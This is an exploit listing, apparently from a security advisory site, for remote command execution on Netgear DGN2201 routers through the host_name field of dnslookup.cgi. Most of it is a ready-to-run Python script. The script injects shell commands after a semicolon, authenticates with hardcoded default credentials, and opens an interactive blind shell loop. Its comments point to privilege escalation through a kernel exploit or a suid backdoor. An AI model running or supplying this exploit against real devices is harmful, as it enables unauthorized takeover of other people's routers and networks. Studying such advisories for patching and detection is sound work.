Netgear DGN2201 v1/v2/v3/v4 dnslookup.cgi Remote Command Execution

2017.02.27
Credit: SivertPL
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/usr/bin/python #Provides access to default user account, privileges can be easily elevated by using either: # - a kernel exploit (ex. memodipper was tested and it worked) # - by executing /bin/bd (suid backdoor present on SOME but not all versions) # - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon) #Pozdrawiam: Kornela, Komara i Sknerusa import sys import requests #You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions #These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to login = 'admin' password = 'password' def main(): if len(sys.argv) < 2: print "./netgearpwn_2.py <router ip>" return spawnShell() def execute(cmd): #Escaping basic sanitization requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password)) return def spawnShell(): print "Dropping a shell-like environment (blind OS injection)" print "To test it type 'reboot'" while True: cmd = raw_input("[blind $] ") execute(cmd) if __name__ == "__main__": main() #2017-02-25 by SivertPL #Tak, to ja.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top